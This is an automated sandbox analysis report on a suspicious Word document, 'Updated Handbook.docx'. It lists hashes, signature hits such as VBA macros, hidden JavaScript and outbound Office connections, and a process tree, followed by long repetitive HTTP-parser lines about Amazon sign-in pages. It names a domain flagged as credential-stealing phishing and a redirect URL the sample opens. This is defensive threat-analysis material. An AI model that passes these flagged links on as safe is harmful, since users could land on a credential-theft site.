Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Updated Handbook.docx

Overview

General Information

Sample name:Updated Handbook.docx
Analysis ID:1491594
MD5:5b06a077487034e4575df481e65c2139
SHA1:bfc759bfa271f1630fd71d0fbd34824c807c2f9b
SHA256:465067a09f19aaadff2fc0987689f9e8a39f6f707a4fcda6ce55a88e18e3bf73
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Connects to many different domains
Connects to several IPs in different countries
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Suspicious Office Outbound Connections
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7048 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • chrome.exe (PID: 7232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1816,i,3842482353412426924,4138602321115753140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49738, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 52.123.243.83, SourceIsIpv6: false, SourcePort: 443
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://specialpoint.net/SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://specialpoint.net/cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2Avira URL Cloud: Label: malware
Source: https://specialpoint.net/HTTP Parser: Base64 decoded: 1723468998.000000
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: <input type="password" .../> found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: <input type="password" .../> found
Source: https://specialpoint.net/HTTP Parser: No favicon
Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlHTTP Parser: No favicon
Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlHTTP Parser: No favicon
Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlHTTP Parser: No favicon
Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlHTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469004166&s=ART4IShklipn4DF0jFH5c9j-o_lVqpVJDsDOZ_ZLQxmn&gdpr_consent=&gdpr_consent_avl=&cb=1723469004166&dcc=tHTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_rb_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=NMc_00QDRY2_1zWXHDYw0g&a=cm&ex-pl-n-kr-new=Naup9umsR8qjcTxFb2ilkg&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=hNTQsyYhS2GGOCcWs3wFCQ&ep=ttam_T219Ay-cPciHbT10nY7Fvbd7iRSpweloqqrJ5pKjcecjBSqbIO9gzY5fZpHW8FVTwAAZTi1FVgAtX8mi3nR_PdVDtHSGTSx896mryq-SdvK8-23WpndIQOIc6JjBzdjSE5yekL8GojgigfQVBTDAt2gU10hYafvg5LOW0CYxHZVakUCPH5iw6dDpEiI9r8Ybj8gK-isRTP44N849cuByCLDpmaA5Rdjmd4H8LICNSzRnWwGC0Z_OU9l81RspLixN_9UCB-Smol5hFXH5SaiIrLKkbD_UPc6KDfeOtBulbOKp3i82M4Rav0mxm8NSL1beSmHspDyDDgmtM_Dn4loVVSbn2tIMnwbHXgNepydfAEt0hqR_u281JN4F1MhoVNG8WC_EHZMxdfifQVJtZvIJGchDMpyUUGsf_9zUrH3SyS4PSGagUack0siuW6ab_qsSaJ2S5kaK_w-E8T8YmnxN_Sf-iv6Qern5EpqRX9siMCQk1vGX2OJfD-WLirBk...HTTP Parser: No favicon
Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469045227&s=AZPOdh-H2vkBLe5oEx6ivATur8ZunNMO9L0H4LMxfs0g&gdpr_consent=&gdpr_consent_avl=&cb=1723469045227HTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=rb_fw_mp_nsln_n-gg-HMT2_n-cx-HMT_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=ebz3o2IklpbIte4bNDyUMifyfHJt_cn85ZfsgrcF1N0tKyVrk-_2z2oLJ5QM0XylYqffvug516HhO7dpIwDBnPwlOe0iuR5vHUFFJ-JNak58lyAl-Xbocpo8xn1lMBpLPu8_v5fMSQh0YINNpyBuhOilRToMkL5-MEH3OLL0t2YHTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
Source: https://www.amazon.ae/fmc/learn-more?ref_=nav_cs_groceriesHTTP Parser: No favicon
Source: https://www.amazon.ae/fmc/learn-more?ref_=nav_cs_groceriesHTTP Parser: No favicon
Source: https://www.amazon.ae/fmc/learn-more?ref_=nav_cs_groceriesHTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469079116&s=AZFFkf9EtlcrPUPGcSoZIoniWI9NDapON2jwlQi-xiST&gdpr_consent=&gdpr_consent_avl=&cb=1723469079116HTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=rb_fw_mp_nsln_n-gg-HMT2_n-cx-HMT_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=ebz3o2IklpbIte4bNDyUMifyfHJt_cn85ZfsgrcF1N0tKyVrk-_2z2oLJ5QM0XylDuocJoBfb2rcilWtHK_US8X1Ool-E9pFgXDDi81e8AJ8lyAl-Xbocpo8xn1lMBpLRJLAzFHcDk1RqMCwEERpwk5_vLq4zBwfBB_TTDwKZM8HTTP Parser: No favicon
Source: https://www.amazon.ae/gp/bestsellers?ref_=nav_cs_bestsellersHTTP Parser: No favicon
Source: https://www.amazon.ae/gp/bestsellers?ref_=nav_cs_bestsellersHTTP Parser: No favicon
Source: https://www.amazon.ae/gp/bestsellers?ref_=nav_cs_bestsellersHTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469095551&s=AQpk3DdUjeD_gde_X-lCDBvoh9mYPPKOxU1_g4FBiIFQ&gdpr_consent=&gdpr_consent_avl=&cb=1723469095551HTTP Parser: No favicon
Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=rb_fw_mp_nsln_n-gg-HMT2_n-cx-HMT_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=ebz3o2IklpbIte4bNDyUMifyfHJt_cn85ZfsgrcF1N0tKyVrk-_2z2oLJ5QM0XylYQ9qJDbwgqPRNech6J7BVKaqIdSNpVbh4id1khWSjfl8lyAl-Xbocpo8xn1lMBpLiy7o6oZuJzs9wuLtoq8QZTjnDCF2fkxuMKnjkOoa-4AHTTP Parser: No favicon
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
